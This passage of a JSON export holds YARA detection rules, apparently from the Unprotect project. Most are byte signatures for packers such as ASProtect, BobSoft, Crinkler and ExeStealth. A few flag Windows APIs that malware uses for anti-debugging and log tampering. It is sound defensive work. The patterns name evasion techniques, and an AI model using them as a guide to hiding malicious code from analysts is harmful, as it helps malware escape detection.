23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_v12_Alexey_Solodovnikov: PEiD\r\n{\r\n strings:\r\n $a = { 90 60 E8 1B 00 00 00 E9 FC 8D B5 0F 06 00 00 8B FE B9 97 00 00 00 AD 35 78 56 34 12 AB 49 75 F6 EB 04 5D 45 55 C3 E9 ?? ?? ?? 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_11_Solodovnikov_Alexey: PEiD\r\n{\r\n strings:\r\n $a = { 60 E9 ?? 04 00 00 E9 ?? ?? ?? ?? ?? ?? ?? EE }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12_additional: PEiD\r\n{\r\n strings:\r\n $a = { 68 01 ?? ?? 00 E8 01 00 00 00 C3 C3 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_130824_Solodovnikov_Alexey: PEiD\r\n{\r\n strings:\r\n $a = { 68 01 ?? ?? 00 E8 01 00 00 00 C3 C3 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_MTEc_additional: PEiD\r\n{\r\n strings:\r\n $a = { 33 C0 BE ?? ?? 8B D8 B9 ?? ?? BF ?? ?? BA ?? ?? 47 4A 74 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_2122_exe_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n strings:\r\n $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_133_21_Registered_Alexey_Solodovnikov_additional: PEiD\r\n{\r\n strings:\r\n $a = { 68 01 ?? ?? ?? E8 01 00 00 00 C3 C3 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_21x_exe_Alexey_Solodovnikov_h: PEiD\r\n{\r\n strings:\r\n $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_Solodovnikov_Alexey: PEiD\r\n{\r\n strings:\r\n $a = { 68 01 F0 58 00 E8 01 00 00 00 C3 C3 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_build_0807_dll_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_01_ASProtect_Anorganix: PEiD\r\n{\r\n strings:\r\n $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_02_ASProtect_Anorganix: PEiD\r\n{\r\n strings:\r\n $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_122_123_Beta_21_Solodovnikov_Alexey: PEiD\r\n{\r\n strings:\r\n $a = { 68 01 E0 46 00 E8 01 00 00 00 C3 C3 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_MTE_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E9 ?? ?? ?? ?? 91 78 79 79 79 E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}"
},
{
"id": 117,
"key": "yara_detect_bobsoft",
"type": {
"id": 1,
"name": "YARA",
"syntax_lang": "YARA"
},
"name": "YARA_Detect_Bobsoft",
"rule": "rule PEiD_Bundle_v100_BoB_BobSoft: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 21 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule PluginToExe_v101_BoB_BobSoft_additional: PEiD\r\n{\r\n strings:\r\n $a = { E8 00 00 00 00 29 C0 5D 81 ED C6 41 40 00 50 8F 85 71 40 40 00 50 FF 95 A5 41 40 00 89 85 6D 40 40 00 FF 95 A1 41 40 00 50 FF 95 B5 41 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 B9 41 40 00 89 85 75 40 40 00 EB 6C 6A 01 8F 85 71 40 40 00 6A 58 6A }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Upx_Lock_10_12_CyberDoom_Team_X_BoB_BobSoft: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 5D 81 ED 48 12 40 00 60 E8 2B 03 00 00 61 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v102_v104_BoB_BobSoft: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v100_BoB_BobSoft_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 21 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Splash_Bitmap_v100_With_Unpack_Code_BoB_Bobsoft: PEiD\r\n{\r\n strings:\r\n $a = { E8 00 00 00 00 60 8B 6C 24 20 55 81 ED ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 29 F9 31 C0 FC F3 AA 8B 04 24 48 66 25 00 F0 66 81 38 4D 5A 75 F4 8B 48 3C 81 3C 01 50 45 00 00 75 E8 89 85 ?? ?? ?? ?? 6A 40 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v100_v101_BoB_BobSoft_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_V102_DLL_BoB_BobSoft: PEiD\r\n{\r\n strings:\r\n $a = { 83 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 00 08 00 39 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule PluginToExe_v102_BoB_BobSoft: PEiD\r\n{\r\n strings:\r\n $a = { E8 00 00 00 00 29 C0 5D 81 ED 32 42 40 00 50 8F 85 DD 40 40 00 50 FF 95 11 42 40 00 89 85 D9 40 40 00 FF 95 0D 42 40 00 50 FF 95 21 42 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 25 42 40 00 89 85 E1 40 40 00 EB 6C 6A 01 8F 85 DD 40 40 00 6A 58 6A 40 FF 95 15 42 40 00 89 85 D5 40 40 00 89 C7 68 00 08 00 00 6A 40 FF 95 15 42 40 00 89 47 1C C7 07 58 00 }\r\n $b = { E8 00 00 00 00 29 C0 5D 81 ED 32 42 40 00 50 8F 85 DD 40 40 00 50 FF 95 11 42 40 00 89 85 D9 40 40 00 FF 95 0D 42 40 00 50 FF 95 21 42 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 25 42 40 00 89 85 E1 40 40 00 EB 6C 6A 01 8F 85 DD 40 40 00 6A 58 6A }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PEiD_Bundle_v102_BoB_BobSoft: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v104_BoB_BobSoft: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_V101_BoB_BobSoft: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 23 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_102_DLL_BoB_BobSoft: PEiD\r\n{\r\n strings:\r\n $a = { 83 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 00 08 00 39 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Imploder_v104_BoB_BobSoft: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v101_BoB_BobSoft_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 23 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_V100_BoB_BobSoft: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 21 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_V102_BoB_BobSoft: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule PluginToExe_v101_BoB_BobSoft: PEiD\r\n{\r\n strings:\r\n $a = { E8 00 00 00 00 29 C0 5D 81 ED C6 41 40 00 50 8F 85 71 40 40 00 50 FF 95 A5 41 40 00 89 85 6D 40 40 00 FF 95 A1 41 40 00 50 FF 95 B5 41 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 B9 41 40 00 89 85 75 40 40 00 EB 6C 6A 01 8F 85 71 40 40 00 6A 58 6A 40 FF 95 A9 41 40 00 89 85 69 40 40 00 89 C7 68 00 08 00 00 6A 40 FF 95 A9 41 40 00 89 47 1C C7 07 58 00 00 00 C7 47 20 00 08 00 00 C7 47 18 01 00 00 00 C7 47 34 04 10 88 00 8D 8D B9 40 40 00 89 4F 0C 8D 8D DB 40 40 00 89 4F 30 FF B5 69 40 40 00 FF 95 95 41 40 00 FF 77 1C 8F 85 75 40 40 00 8B 9D 6D 40 40 00 60 6A 00 6A 01 53 81 C3 ?? ?? ?? 00 FF D3 61 6A 00 68 44 69 45 50 FF B5 75 40 40 00 6A 00 81 C3 ?? ?? 00 00 FF D3 83 C4 10 83 BD 71 40 40 00 00 74 10 FF 77 1C FF 95 AD 41 40 00 57 FF 95 AD 41 40 00 6A 00 FF 95 9D 41 40 00 }\r\n $b = { E8 00 00 00 00 29 C0 5D 81 ED C6 41 40 00 50 8F 85 71 40 40 00 50 FF 95 A5 41 40 00 89 85 6D 40 40 00 FF 95 A1 41 40 00 50 FF 95 B5 41 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 B9 41 40 00 89 85 75 40 40 00 EB 6C 6A 01 8F 85 71 40 40 00 6A 58 6A }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule BobPack_v100_BoB_BobSoft: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 8B 0C 24 89 CD 83 E9 06 81 ED ?? ?? ?? ?? E8 3D 00 00 00 89 85 ?? ?? ?? ?? 89 C2 B8 5D 0A 00 00 8D 04 08 E8 E4 00 00 00 8B 70 04 01 D6 E8 76 00 00 00 E8 51 01 00 00 E8 01 01 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule BobSoft_Mini_Delphi_BoB_BobSoft_additional: PEiD\r\n{\r\n strings:\r\n $a = { 55 8B EC 83 C4 F0 B8 ?? ?? ?? ?? E8 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule BobSoft_Mini_Delphi_BoB_BobSoft: PEiD\r\n{\r\n strings:\r\n $a = { 55 8B EC 83 C4 F0 53 56 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B8 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v100_v101_BoB_BobSoft: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule BobPack_v100_BoB_BobSoft_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 8B 0C 24 89 CD 83 E9 06 81 ED ?? ?? ?? ?? E8 3D 00 00 00 89 85 ?? ?? ?? ?? 89 C2 B8 5D 0A 00 00 8D 04 08 E8 E4 00 00 00 8B 70 04 01 D6 E8 76 00 00 00 E8 51 01 00 00 E8 01 01 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule PluginToExe_v102_BoB_BobSoft_additional: PEiD\r\n{\r\n strings:\r\n $a = { E8 00 00 00 00 29 C0 5D 81 ED 32 42 40 00 50 8F 85 DD 40 40 00 50 FF 95 11 42 40 00 89 85 D9 40 40 00 FF 95 0D 42 40 00 50 FF 95 21 42 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 25 42 40 00 89 85 E1 40 40 00 EB 6C 6A 01 8F 85 DD 40 40 00 6A 58 6A }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v101_BoB_BobSoft: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 23 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Splash_Bitmap_v100_BoB_Bobsoft: PEiD\r\n{\r\n strings:\r\n $a = { E8 00 00 00 00 60 8B 6C 24 20 55 81 ED ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 29 F9 31 C0 FC F3 AA 8B 04 24 48 66 25 00 F0 66 81 38 4D 5A 75 F4 8B 48 3C 81 3C 01 50 45 00 00 75 E8 89 85 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 6A 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Upx_Lock_10_12_CyberDoom_Team_X_BoB_BobSoft_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 5D 81 ED 48 12 40 00 60 E8 2B 03 00 00 61 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule PluginToExe_v100_BoB_BobSoft_additional: PEiD\r\n{\r\n strings:\r\n $a = { E8 00 00 00 00 29 C0 5D 81 ED D1 40 40 00 50 FF 95 B8 40 40 00 89 85 09 40 40 00 FF 95 B4 40 40 00 89 85 11 40 40 00 50 FF 95 C0 40 40 00 8A 08 80 F9 22 75 07 50 FF 95 C4 40 40 00 89 85 0D 40 40 00 8B 9D 09 40 40 00 60 6A 00 6A 01 53 81 C3 ?? ?? ?? 00 FF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule PEiD_Bundle_v102_v103_DLL_BoB_BobSoft: PEiD\r\n{\r\n strings:\r\n $a = { 83 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 00 08 00 39 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule PluginToExe_v100_BoB_BobSoft: PEiD\r\n{\r\n strings:\r\n $a = { E8 00 00 00 00 29 C0 5D 81 ED D1 40 40 00 50 FF 95 B8 40 40 00 89 85 09 40 40 00 FF 95 B4 40 40 00 89 85 11 40 40 00 50 FF 95 C0 40 40 00 8A 08 80 F9 22 75 07 50 FF 95 C4 40 40 00 89 85 0D 40 40 00 8B 9D 09 40 40 00 60 6A 00 6A 01 53 81 C3 ?? ?? ?? 00 FF D3 61 6A 00 68 44 69 45 50 FF B5 0D 40 40 00 6A 00 81 C3 ?? ?? ?? 00 FF D3 83 C4 10 FF 95 B0 40 40 00 }\r\n $b = { E8 00 00 00 00 29 C0 5D 81 ED D1 40 40 00 50 FF 95 B8 40 40 00 89 85 09 40 40 00 FF 95 B4 40 40 00 89 85 11 40 40 00 50 FF 95 C0 40 40 00 8A 08 80 F9 22 75 07 50 FF 95 C4 40 40 00 89 85 0D 40 40 00 8B 9D 09 40 40 00 60 6A 00 6A 01 53 81 C3 ?? ?? ?? 00 FF }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PEiD_Bundle_v102_v103_BoB_BobSoft: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}"
},
{
"id": 73,
"key": "yara_detect_closehandle",
"type": {
"id": 1,
"name": "YARA",
"syntax_lang": "YARA"
},
"name": "YARA_Detect_CloseHandle",
"rule": "rule Detect_CloseHandle: AntiDebug {\r\n meta: \r\n description = \"Detect CloseHandle as anti-debug\"\r\n author = \"Unprotect\"\r\n comment = \"Experimental rule\"\r\n strings:\r\n $1 = \"NtClose\" fullword ascii\r\n $2 = \"CloseHandle\" fullword ascii\r\n condition: \r\n uint16(0) == 0x5A4D and filesize < 1000KB and any of them\r\n}"
},
{
"id": 111,
"key": "yara_detect_crinkler",
"type": {
"id": 1,
"name": "YARA",
"syntax_lang": "YARA"
},
"name": "YARA_Detect_Crinkler",
"rule": "rule Crinkler_V01_V02_Rune_LHStubbe_and_Aske_Simon_Christensen: PEiD\r\n{\r\n strings:\r\n $a = { B9 ?? ?? ?? ?? 01 C0 68 ?? ?? ?? ?? 6A 00 58 50 6A 00 5F 48 5D BB 03 00 00 00 BE ?? ?? ?? ?? E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Crinkler_V03_V04_Rune_LHStubbe_and_Aske_Simon_Christensen_additional: PEiD\r\n{\r\n strings:\r\n $a = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Crinkler_V01_V02_Rune_LHStubbe_and_Aske_Simon_Christensen_additional: PEiD\r\n{\r\n strings:\r\n $a = { B8 EF BE AD DE 50 6A ?? FF 15 10 19 40 ?? E9 AD FF FF FF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Crinkler_V03_V04_Rune_LHStubbe_and_Aske_Simon_Christensen: PEiD\r\n{\r\n strings:\r\n $a = { B8 00 00 42 00 31 DB 43 EB 58 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}"
},
{
"id": 74,
"key": "yara_detect_csrgetprocessid",
"type": {
"id": 1,
"name": "YARA",
"syntax_lang": "YARA"
},
"name": "YARA_Detect_CsrGetProcessID",
"rule": "rule Detect_CsrGetProcessID: AntiDebug {\r\n meta: \r\n description = \"Detect CsrGetProcessID as anti-debug\"\r\n author = \"Unprotect\"\r\n comment = \"Experimental rule\"\r\n strings:\r\n $1 = \"CsrGetProcessID\" fullword ascii\r\n $2 = \"GetModuleHandle\" fullword ascii\r\n condition: \r\n uint16(0) == 0x5A4D and filesize < 1000KB and 2 of them \r\n}"
},
{
"id": 83,
"key": "yara_detect_eventlogtampering",
"type": {
"id": 1,
"name": "YARA",
"syntax_lang": "YARA"
},
"name": "YARA_Detect_EventLogTampering",
"rule": "rule Detect_EventLogTampering: AntiForensic {\r\n meta: \r\n description = \"Detect NtLoadDriver and other as anti-forensic\"\r\n author = \"Unprotect\"\r\n comment = \"Experimental rule\"\r\n strings:\r\n $1 = \"NtLoadDriver \" fullword ascii\r\n $2 = \"NdrClientCall2\" fullword ascii\r\n condition: \r\n uint16(0) == 0x5A4D and filesize < 1000KB and any of them \r\n}"
},
{
"id": 75,
"key": "yara_detect_eventpairhandles",
"type": {
"id": 1,
"name": "YARA",
"syntax_lang": "YARA"
},
"name": "YARA_Detect_EventPairHandles",
"rule": "rule Detect_EventPairHandles: AntiDebug {\r\n meta: \r\n description = \"Detect EventPairHandlesas anti-debug\"\r\n author = \"Unprotect\"\r\n comment = \"Experimental rule\"\r\n strings:\r\n $1 = \"EventPairHandles\" fullword ascii\r\n $2 = \"RtlCreateQueryDebugBuffer\" fullword ascii\r\n $3 = \"RtlQueryProcessHeapInformation\" fullword ascii\r\n condition: \r\n uint16(0) == 0x5A4D and filesize < 1000KB and 2 of them \r\n}"
},
{
"id": 71,
"key": "yara_detect_exceptionhandler",
"type": {
"id": 1,
"name": "YARA",
"syntax_lang": "YARA"
},
"name": "YARA_Detect_ExceptionHandler",
"rule": "rule Detect_SuspendThread: AntiDebug {\r\n meta: \r\n description = \"Detect SuspendThread as anti-debug\"\r\n author = \"Unprotect\"\r\n comment = \"Experimental rule\"\r\n strings:\r\n $1 = \"UnhandledExcepFilter\" fullword ascii\r\n $2 = \"SetUnhandledExceptionFilter\" fullword ascii\r\n condition: \r\n uint16(0) == 0x5A4D and filesize < 1000KB and any of them \r\n}"
},
{
"id": 104,
"key": "yara_detect_exestealth",
"type": {
"id": 1,
"name": "YARA",
"syntax_lang": "YARA"
},
"name": "YARA_Detect_Exestealth",
"rule": "rule ExeStealth_WebToolMaster: PEiD\r\n{\r\n strings:\r\n $a = { EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_v275a_WebtoolMaster_h_additional: PEiD\r\n{\r\n strings:\r\n $a = { EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 20 2D 20 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 00 90 60 90 E8 00 00 00 00 5D 81 ED F7 27 40 00 B9 15 00 00 00 83 C1 04 83 C1 01 EB 05 EB FE 83 C7 56 EB 00 EB 00 83 E9 02 81 C1 78 43 27 65 EB 00 81 C1 10 25 94 00 81 E9 63 85 00 00 B9 96 0C 00 00 90 8D BD 74 28 40 00 8B F7 AC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? AA E2 C5 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_275_WebtoolMaster_additional: PEiD\r\n{\r\n strings:\r\n $a = { 33 C9 B4 4E CD 21 73 02 FF ?? BA ?? 00 B8 ?? 3D CD 21 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_276_Unregistered_WebtoolMaster_additional: PEiD\r\n{\r\n strings:\r\n $a = { EB ?? 45 78 65 53 74 65 61 6C 74 68 20 56 32 20 53 68 61 72 65 77 61 72 65 20 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_276_Unregistered_WebtoolMaster: PEiD\r\n{\r\n strings:\r\n $a = { EB ?? 45 78 65 53 74 65 61 6C 74 68 20 56 32 20 53 68 61 72 65 77 61 72 65 20 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_275_WebtoolMaster: PEiD\r\n{\r\n strings:\r\n $a = { 90 60 90 E8 00 00 00 00 5D 81 ED D1 27 40 00 B9 15 00 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_v275a_WebtoolMaster: PEiD\r\n{\r\n strings:\r\n $a = { EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 20 2D 20 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 00 90 60 90 E8 00 00 00 00 5D 81 ED F7 27 40 00 